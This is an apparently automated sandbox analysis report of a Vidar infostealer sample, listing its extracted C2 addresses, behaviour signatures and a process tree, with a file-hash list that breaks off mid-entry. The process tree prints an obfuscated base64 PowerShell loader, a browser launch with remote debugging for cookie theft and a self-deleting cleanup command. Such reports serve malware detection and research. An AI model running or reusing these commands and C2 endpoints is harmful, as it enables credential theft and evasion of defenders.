Analysis

  • max time kernel
    129s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/06/2025, 17:46

General

  • Target

    5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe

  • Size

    951KB

  • MD5

    600623ba27769989d981904debcc3774

  • SHA1

    08b03982c2c7fe5b35f1379bca1e8832cb294764

  • SHA256

    5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd

  • SHA512

    42ede2b6dd77ab72afa1449e5bc2710c74e586c1468126814787c0b7ad6bfe69f6c0c58cc7b212594d217146c47c89af4f890464f726648ca9f0ea648a739328

  • SSDEEP

    12288:G6yQn1ME0VKFY8eoVEaXltnHGsdCBh46dV51satxZ7YT928nIpSm8satxZ7YT92l:puE0Vsb8ImfhRsatx428Issatx428I

Malware Config

Extracted

Family

vidar

Version

14.4

Botnet

5838abba2c7ca0756153b41aab8534b5

C2

https://t.me/q0l0o

https://steamcommunity.com/profiles/76561199872233764

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0

Signatures

  • Detect Vidar Stealer 40 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
    "C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:680
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4128
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff88865dcf8,0x7ff88865dd04,0x7ff88865dd10
          4⤵
            PID:4632
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2000 /prefetch:2
            4⤵
              PID:4756
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2224,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2236 /prefetch:3
              4⤵
                PID:4924
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2516 /prefetch:8
                4⤵
                  PID:4528
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3168 /prefetch:1
                  4⤵
                    PID:4704
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3204 /prefetch:1
                    4⤵
                      PID:4612
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4192,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4244 /prefetch:2
                      4⤵
                        PID:4844
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4520,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4572 /prefetch:1
                        4⤵
                          PID:3740
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5104 /prefetch:8
                          4⤵
                            PID:1700
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5364 /prefetch:8
                            4⤵
                              PID:3668
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5100,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5136 /prefetch:8
                              4⤵
                                PID:5480
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5676,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5692 /prefetch:8
                                4⤵
                                  PID:4044
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5844 /prefetch:8
                                  4⤵
                                    PID:5804
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5136,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5868 /prefetch:8
                                    4⤵
                                      PID:2552
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQAzADEAOQAyADsAJABiAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADYAMQBGADYALgB0AG0AcAAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAbgBFAHcALQBvAEIAagBFAEMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQBbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcgBWAFgAZgBiADkAbwB3AEUASAA3AFAAWAArAEUAeABIAGgATABKAG8AQQB6AFEAZgBoAFIARgBLAGcAMwB0AFYAcQBuAFQATwBtAEIAYgBWADgAUwBEAFMAUQA0AFMAegBiAEUAagB4ADQARwB3AHcAdgA4ACsASgB6AEUAdABhAGIATwBwAFYAUABNAEQAdgBvAHQAOQA5ADkAMwBIAGQAeQBlAC8AUgBqADkAWABxADYAKwBMAFcAKwBxAHYAUAByAHcAegBtAG8AawBrAFEAawA3AEMAQwBKAEMARABQAG8ASgBzAEQAWQBrAEUAdwArAGYAbwB6AGsAQgBxAE4AYgAxAFUAQwBHAEIAUABMAGgAUgBuAFEARQBtAGMAZwBLACsAKwBtADUAVgA3AEwAZgBTAFEAMQBXAHAAUAB1AEMAUgAwAEQAQgA1AG4AZgBtAEwAcwAwAEQAbwBJAEsAYQBpAEEAZgBYAEMATABTAHQAUwAxAEQARwBQAGcAKwA2ADMASgBKAGwAYgBSACsAZQA4AFEARgBpAEUATABaAGMAZwBaAE8AbQAwAFkAYQBSAEsAeQBKAFIAcAB2AEUAZwBsAFIALwA5AEIAcABqADEASQBtAEYAVQByADcAawBrAGsAUQBQAEIANgBEAFcASQBVAGUASgBIADAAagBUAHUAYwAwADkASgBCAEgAUwBaAEsAZwBtADUASwBNAEsAaQBHAFIASwBBADIAWgBSAEEAUABIAHoAbQB6AGIANwB1AEMAegAzAE8AagBaAE4AbgBiAEwATAArAC8AeABzAEQAQQA2AE4AagA0AHYAagBEAGQAMgB2AHcAaQBlAEQAaQBtADkAagBHAEkAdQBwAE4AbgA0AEIAWQBJAEIANwBYAFkAYQAxAGsAdwBSAGwAUQBvAEgATQBvAFgAUABrAEMAcgBqAFcAZwByADAASgBRAFoAMgBMAGIAZwBxAEoARABFAEwAdQBBAHoAUABPAGEAZABvAGcAdwB2AHYAdAAzAFYARQB5AGkATABRAHAAVAB5AEIAVAA0AFQANQBGAEUAeQBOAGsAVgBuAEgAMQAvAFUAOQBGAEQASQBsAGQARQBBAHAAOQA4ADYAegArADAAeABZAEcALwB2AHkAeQBvADIAVQAyAC8AegBvAFkAbgArAEkAVQBJAEsAbQAvAHgAawBpAEwAagBZADEAUwBQAE8ATgBoAE8AbgBzAEEAWQB1AG4AVwBwAG4AagA4AFQAUQByAGgAUwBqAEIAawA3AFcAOAB2AG0AbgByAGYAOABCAGQAMABEAFEASgBMAGwAVQBuAGkAZABUAEwARwA5AFEAbABYAGcARAAvAHcAbgB5AEIAVQBLADQAQQBOAFcAVQBqADkAZQBkAEoAbQBBAFQASwA4AGYAOAB1AGwAdgBiAEoAMwBwAGkAWABCADkANwBlADkAegBXACsAbgBnAGkATgBWADEAQQBaAGwAZAAwAFoANwA5AFgAdwByAFgASgBRADgAcQBXAGoAQQArAGUAdwBtAFEAZgBiAHMANgAyADcASABXADcAUAA4AFkATABRAEIASABDAHMAYwArAGMAcgBYAEoAaQBCADQANQBSAGgANwBWAHMAMQBqAFoAWQBBAG0AUwBwAE8AeABkAFgAKwA0ADgAUwBSADgANgBnAGIAQQAzAHcAUQBpADQAdgBLAEwATAA5ADkAQgBXAHcAcABBADIAeABuAFgAVABXAGMAVwB6AHYAcgBxAEUAMQA1AFAAYgB1AEsASABGAFcAUgA3AHcANABIAEoAcgBEADYAbABVAHAAMgA5ADQARQBGAGUAOQA1AFgAOABhACsAZQBOAEYARwBBAEkAMgB4AHEARABRAC8AcgA2AE4AbABGADgAMwBEAHIASwBKAEIAMQBBAFYASQB6AEcAVABtAE0ALwA1AGgAdABEAHIAQgArAE4AawBDAGUAdQBiADQAcABhAHoAawA4AE8ANgA4AFcAUwBqAG8AMQAzAFYAZwBWAHkAMQBZADQAVgBmADkAUQBqAEkAcABRADgAawBWAEMAMQBkADkAUwBaAEgAVgBmADcAWQB5AGQAMABUAGgARgByAFMAdgBDAGwAaQBsAFoAQQBuAEwASABBAFIARwB4ADAAZgBTAGQAcQBjAHYAWgBDAG8AUwBjAG4AWgB4AGMAQwBCADYAZABrAFEAVABlADkAcwBaAFMAcQBFAGYARQBOAFAAUAAzAFQASgAxAEwAOQBYAEsAaAAxAG8AaQBzAFUAWABOAHUAVwBjAGIAMABSAGwAMABlAG0AZABOAGMAbABHADUAbgAxAGkAUwA0ADYAVgB0AC8AQQBBAD0APQAnACkALABbAHMAeQBTAFQAZQBNAC4ASQBvAC4AQwBPAG0AUAByAGUAUwBzAGkATwBOAC4AYwBPAG0AcAByAGUAUwBTAGkATwBOAE0AbwBkAGUAXQA6ADoAZABFAEMAbwBtAHAAcgBlAFMAUwApAHwAJQB7AG4ARQB3AC0AbwBCAGoARQBDAFQAIABJAE8ALgBzAHQAUgBlAGEAbQByAGUAYQBkAEUAUgAoACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQApAH0AfAAlAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApAH0AKQAgAA==
                                    3⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5684
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.cmdline"
                                      4⤵
                                        PID:2900
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES732C.tmp" "c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\CSCB76A280560FE48389084FC30EF7E3DC5.TMP"
                                          5⤵
                                            PID:1500
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        3⤵
                                        • Uses browser remote debugging
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        • Modifies registry class
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2940
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff87810f208,0x7ff87810f214,0x7ff87810f220
                                          4⤵
                                            PID:2884
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
                                            4⤵
                                              PID:548
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
                                              4⤵
                                                PID:1544
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:8
                                                4⤵
                                                  PID:1788
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  PID:2872
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  PID:1156
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
                                                  4⤵
                                                    PID:3652
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5108,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:8
                                                    4⤵
                                                      PID:1940
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:8
                                                      4⤵
                                                        PID:4832
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nopz" & exit
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2092
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 11
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:4440
                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                  1⤵
                                                    PID:4712
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:4024
                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                      1⤵
                                                        PID:3256
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                        1⤵
                                                          PID:1784

                                                        Network

                                                              MITRE ATT&CK Enterprise v16

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\ProgramData\2nopz\sj5pp8

                                                                Filesize

                                                                288KB

                                                                MD5

                                                                8900ece47d3bd26ea398d48fecb34fa8

                                                                SHA1

                                                                b393c8fdafb3a733883caf02d347f22e8e19285a

                                                                SHA256

                                                                94009c06a22ae20b38a9bfeccd9aba3ad976a93531aebd36cb481ebf28eb32ea

                                                                SHA512

                                                                ba5e26519249915e7b5b55c371bc8e582d9da74b90790b5ce2f0cb4fa399a520a780dbe0e31d126c661bf006fbcd0fe83cb394a82217d6aacd574d94a1355548

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                Filesize

                                                                2B

                                                                MD5

                                                                d751713988987e9331980363e24189ce

                                                                SHA1

                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                SHA256

                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                SHA512

                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                Filesize

                                                                79KB

                                                                MD5

                                                                115d9ce05d47a739e587d36f9c7d1a9e

                                                                SHA1

                                                                b64cb2738901da0b9695025ea32b90f213c69a92

                                                                SHA256

                                                                28bbe5a1f0a5060281fdf42a90c8d02de1352786aba1aa4e171c7ccd7e242f22

                                                                SHA512

                                                                835673212ac7449f17ac26efc1572715ebbdc3389a9f6a5cd053f481936a1bc52cde491453a687623de4ce70a0c54a461ffac282324635b577a70dd9f0d91bf1

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                280B

                                                                MD5

                                                                36326fcbb6119326e7c8aa24c4156548

                                                                SHA1

                                                                ed128a9727e1d58b970e732b8c66fc827b18372b

                                                                SHA256

                                                                ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987

                                                                SHA512

                                                                ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                511104f39140f1055bf70ff41657eefb

                                                                SHA1

